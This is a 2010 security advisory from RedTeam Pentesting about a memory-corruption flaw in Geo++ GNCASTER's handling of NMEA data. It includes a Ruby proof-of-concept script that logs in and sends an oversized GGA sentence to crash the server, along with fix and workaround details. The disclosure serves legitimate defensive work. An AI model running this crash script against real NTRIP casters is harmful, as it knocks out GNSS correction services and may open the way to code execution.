Geo++(R) GNCASTER Insecure Handling Of NMEA-Data

Published 27 Jan 2010, reported by redteam-pentesting.de. Type: packetstorm. Source: packetstormsecurity.com

Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data
  
During a penetration test, RedTeam Pentesting discovered that the
GNCaster software does not handle NMEA-data correctly. An attacker who
has valid login credentials can use this to crash the server software or
potentially execute code on the server.
  
Details  
=======  
  
Product: Geo++(R) GNCASTER  
Affected Versions: <= 1.4.0.7  
Fixed Versions: 1.4.0.8  
Vulnerability Type: Memory corruption  
Security Risk: medium  
Vendor URL: http://www.geopp.de  
Vendor Status: notified  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-002  
Advisory Status: published  
CVE: TBA  
CVE URL: TBA  
  
  
Introduction  
============  
  
"Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP  
is a protocol within RTCM to provide GNSS information via Internet."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
After logging in, the GNCaster server software allows the user to  
receive data streams. For some of these streams the user can send  
so-called NMEA-data to the server to specify the user's geographical  
position. If an attacker sends a long data string, the server software  
crashes. RedTeam Pentesting believes it is also possible to exploit this  
vulnerability to execute code on the server.  
  
  
Proof of Concept  
================  
  
The following ruby script can be used to crash the GNCaster server:  
  
-------------------------------------------------------------------
#!/usr/bin/env ruby
######################################
#                                    #
#      RedTeam Pentesting GmbH       #
#       [email protected]        #
#  http://www.redteam-pentesting.de  #
#                                    #
######################################

require 'socket'
require 'base64'

if ARGV.length < 3 then
  puts "USAGE: %s host:port user:password stream" % __FILE__
  puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
  puts
  exit
end

host, port = ARGV[0].split(':')
pw, stream = ARGV[1..2]

begin
  puts "requesting stream %s" % stream.inspect
  sock = TCPSocket.new(host, port.to_i)
  # NTRIP stream request: HTTP GET for the mountpoint with Basic authentication
  sock.write("GET %s HTTP/1.1\r\n" % stream)
  sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
  sock.write("\r\n")

  response = sock.readline

  puts "server response: %s" % response.inspect

  # GGA sentence with 2000 filler bytes inserted after the "$GP" prefix
  puts "sending modified nmea data"
  sock.write("$GP" + "A" * 2000 +
             "GGA,134047.00,5005.40000000,N,00839.60000000," +
             "E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
  puts "done"
end
-------------------------------------------------------------------
  
  
Workaround  
==========  
  
A vulnerable server can be protected by an application-layer firewall
that filters overly long NMEA-data before it reaches the caster.
  
  
Fix  
===  
  
Update GNCASTER to version 1.4.0.8.  
  
  
Security Risk  
=============  
  
As an attacker needs valid user credentials for this attack, the risk of  
this vulnerability is regarded as medium. If streams that use NMEA-data  
are publicly available, the risk should be considered as high.  
  
  
History  
=======  
  
2009-07-07 Vulnerability identified during a penetration test  
2009-07-14 Meeting with customer  
2009-12-01 Vendor releases fixed version  
2010-01-27 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. In this way,
security weaknesses in company networks or products are uncovered and
can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance public knowledge with research in
security-related areas. The results are made available as public
security advisories.
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
-- 
RedTeam Pentesting GmbH                 Tel.: +49 241 963-1300
Dennewartstr. 25-27                     Fax : +49 241 963-1304
52068 Aachen                            http://www.redteam-pentesting.de/
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck
